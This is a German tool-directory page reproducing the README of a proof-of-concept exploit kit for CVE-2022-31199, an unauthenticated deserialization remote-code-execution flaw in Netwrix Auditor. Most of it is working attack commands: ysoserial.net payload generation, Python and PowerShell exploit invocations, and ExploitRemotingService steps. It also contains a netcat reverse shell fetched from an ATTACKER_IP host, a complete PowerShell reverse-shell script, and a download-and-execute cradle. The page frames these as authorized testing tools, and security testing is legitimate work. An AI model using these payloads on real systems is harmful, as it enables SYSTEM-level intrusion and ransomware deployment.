Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-31199 — Proof-of-Concept-Exploits für CVE-2022-31199, eine kritische .NET-Deserialisierungs-RCE in Netwrix Auditor. Enthält Python- und PowerShell-Skripte, Payload-Erzeugung mit ysoserial.net und Erkennungssignaturen für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/developerfred/cve-2022-31199
SchwachstellenanalyseExploitationPenetrationstestsCommand and ControlLernen & BildungRed TeamingPayload-EntwicklungLabs & Praxis
GitHub
developerfred/cve-2022-31199

CVE-2022-31199

Proof-of-Concept-Exploits für CVE-2022-31199, eine kritische .NET-Deserialisierungs-RCE in Netwrix Auditor. Enthält Python- und PowerShell-Skripte, Payload-Erzeugung mit ysoserial.net und Erkennungssignaturen für autorisierte Sicherheitstests.

Repository anzeigen
14vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-31199 - Netwrix Auditor RCE Exploit POCs

🔍 Schwachstellenübersicht

CVE-2022-31199 ist eine kritische unsichere Objektdeserialisierungs-Schwachstelle in Netwrix Auditor-Versionen vor 10.5. Die Schwachstelle existiert in einem ungesicherten .NET Remoting-Dienst, der auf TCP-Port 9004 lauscht und es nicht authentifizierten entfernten Angreifern ermöglicht, Code mit den Berechtigungen NT AUTHORITY\SYSTEM auszuführen.

Details zur Schwachstelle

  • CVE-ID: CVE-2022-31199
  • CVSS-Score: 9.8 (Kritisch)
  • CWE: CWE-502 (Deserialisierung nicht vertrauenswürdiger Daten)
  • Betroffene Versionen: Netwrix Auditor < 10.5
  • Angriffsvektor: Netzwerk (nicht authentifiziert)
  • Erforderliche Berechtigungen: Keine
  • Auswirkungen: Vollständige Systemkompromittierung mit SYSTEM-Berechtigungen
  • CISA KEV: Im Katalog bekannter ausgenutzter Schwachstellen gelistet

Auswirkungen in der Praxis

Diese Schwachstelle wurde in freier Wildbahn aktiv ausgenutzt durch:

  • Truebot-Malware-Kampagne (russisch-affiliierte CLOP/TA505 Ransomware-Betreiber)
  • Silence-Cyberkriminellengruppe
  • FIN11-Akteure

Eine erfolgreiche Ausnutzung führt typischerweise zu:

  • Vollständiger Kompromittierung der Active Directory-Domäne
  • Lateralem Movement über überwachte Systeme hinweg
  • Datenextraktion
  • Ransomware-Einsatz

📦 Repository-Inhalte

Dieses Repository enthält vollständige Proof-of-Concept (POC)-Exploits für CVE-2022-31199:

Dateien

  1. exploit.py - Python-basiertes Exploitation-Framework
  2. exploit.ps1 - PowerShell-Exploitation-Skript
  3. README.md - Diese Dokumentation
  4. manual-exploitation.md - Schritt-für-Schritt-Anleitung zur manuellen Ausnutzung

🛠️ Anforderungen

Erforderliche Werkzeuge

Windows-basierte Ausnutzung (empfohlen)

  • ysoserial.net - .NET-Deserialisierungs-Payload-Generator

    • Download: https://github.com/pwntester/ysoserial.net
    • Releases: https://github.com/pwntester/ysoserial.net/releases
  • ExploitRemotingService - .NET Remoting-Exploitation-Tool

    • Download: https://github.com/tyranid/ExploitRemotingService
    • Alternative (erweitert): https://github.com/codewhitesec/ExploitRemotingService

Python-Skript-Anforderungen

  • Python 3.6 oder höher
  • Nur Standardbibliothek (keine externen Abhängigkeiten für grundlegende Prüfungen)
  • Zugriff auf ysoserial.net- und ExploitRemotingService-Ausführungsdateien

PowerShell-Skript-Anforderungen

  • PowerShell 5.1 oder höher
  • Windows-Betriebssystem
  • ysoserial.exe und ExploitRemotingService.exe im Skriptverzeichnis

🚀 Schnellstart

1. Prüfen, ob das Ziel verwundbar ist

Mit Python:

python3 exploit.py --target 192.168.1.100 --check

Mit PowerShell:

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

2. Payload generieren

# Mit ysoserial.net
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "whoami"

3. Exploit ausführen

Python (mit vorab generiertem Payload):

python3 exploit.py --target 192.168.1.100 --payload [BASE64_PAYLOAD]

PowerShell (automatisch):

.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

📖 Detaillierte Nutzung

Python-Exploit (exploit.py)

Grundlegende Schwachstellenprüfung

python3 exploit.py --target 10.10.10.100 --check

Vollständige Ausnutzung mit benutzerdefiniertem Payload

# Schritt 1: Payload generieren
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c whoami > C:\temp\output.txt"

# Schritt 2: Exploit ausführen
python3 exploit.py --target 10.10.10.100 --payload AAEAAAD....[base64_payload]

Erweiterte Optionen

# Benutzerdefinierter Port
python3 exploit.py --target 10.10.10.100 --port 9004 --check

# Benutzerdefinierter Endpunkt
python3 exploit.py --target 10.10.10.100 --endpoint UAVRServer --check

Befehlszeilenargumente

--target    : Ziel-IP-Adresse oder Hostname (erforderlich)
--port      : Zielport (Standard: 9004)
--endpoint  : .NET Remoting-Endpunktname (Standard: UAVRServer)
--check     : Nur Schwachstelle prüfen, nicht ausnutzen
--payload   : Base64-codierter Payload von ysoserial.net

PowerShell-Exploit (exploit.ps1)

Nur Schwachstellenprüfung

.\exploit.ps1 -Target 192.168.1.100 -CheckOnly

Befehl ausführen

# Einfache Befehlsausführung
.\exploit.ps1 -Target 192.168.1.100 -Command "whoami"

# Ausgabe in Datei schreiben
.\exploit.ps1 -Target 192.168.1.100 -Command "cmd /c whoami > C:\temp\out.txt"

# Benutzerdefinierter Port
.\exploit.ps1 -Target 192.168.1.100 -Port 9004 -Command "hostname"

Parameter

-Target     : Ziel-IP-Adresse oder Hostname (erforderlich)
-Port       : Zielport (Standard: 9004)
-Command    : Auf dem Ziel auszuführender Befehl (Standard: "whoami")
-CheckOnly  : Nur Schwachstelle prüfen, nicht ausnutzen

🎯 Ausnutzungsbeispiele

Beispiel 1: Informationssammlung

# Systeminformationen abrufen
ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "cmd /c systeminfo > C:\temp\sysinfo.txt"

Beispiel 2: Reverse Shell

Listener einrichten:

nc -lvnp 4444

Payload generieren:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c curl http://ATTACKER_IP/nc.exe -o C:\temp\nc.exe; C:\temp\nc.exe ATTACKER_IP 4444 -e cmd.exe"

Beispiel 3: PowerShell-Reverse-Shell

Reverse-Shell-Skript erstellen (rev.ps1):

$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()

Skript hosten:

python3 -m http.server 8000

Payload generieren:

ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP:8000/rev.ps1')"

Beispiel 4: Direkte Verwendung von ExploitRemotingService

# Konnektivität testen
ExploitRemotingService.exe tcp://192.168.1.100:9004/UAVRServer ver

# Mit Lease-Modus ausführen (umgeht einige Schutzmaßnahmen)
ExploitRemotingService.exe -uselease tcp://192.168.1.100:9004/UAVRServer ls C:\

# Mit Objektreferenz ausführen
ExploitRemotingService.exe -useobjref tcp://192.168.1.100:9004/UAVRServer exec "whoami"

🔬 Technische Details

Grundursache der Schwachstelle

Die Schwachstelle beruht auf:

  1. Ungesichertem .NET Remoting-Endpunkt auf TCP-Port 9004
  2. BinaryFormatter-Deserialisierung ohne ordnungsgemäße Typfilterung
  3. UAVRServer-Dienst, der beliebige serialisierte Objekte akzeptiert
  4. Dienst, der in typischen Bereitstellungen mit SYSTEM-Berechtigungen läuft

Ausnutzungsprozess

1. Angreifer verbindet sich mit TCP-Port 9004
2. Identifiziert den .NET Remoting-Dienst (UAVRServer-Endpunkt)
3. Erstellt bösartigen serialisierten Payload mit ysoserial.net
4. Sendet den Payload über das .NET Remoting-Protokoll
5. Ziel deserialisiert das Objekt mit BinaryFormatter
6. Gadget-Kette führt beliebigen Code aus
7. Code wird mit NT AUTHORITY\SYSTEM-Berechtigungen ausgeführt

Unterstützte Gadget-Ketten

Die folgenden ysoserial.net-Gadgets funktionieren gegen diese Schwachstelle:

  • TypeConfuseDelegate (empfohlen)
  • ObjectDataProvider
  • PSObject
  • WindowsIdentity
  • TextFormattingRunProperties

Netzwerkprotokoll

Tool herunterladen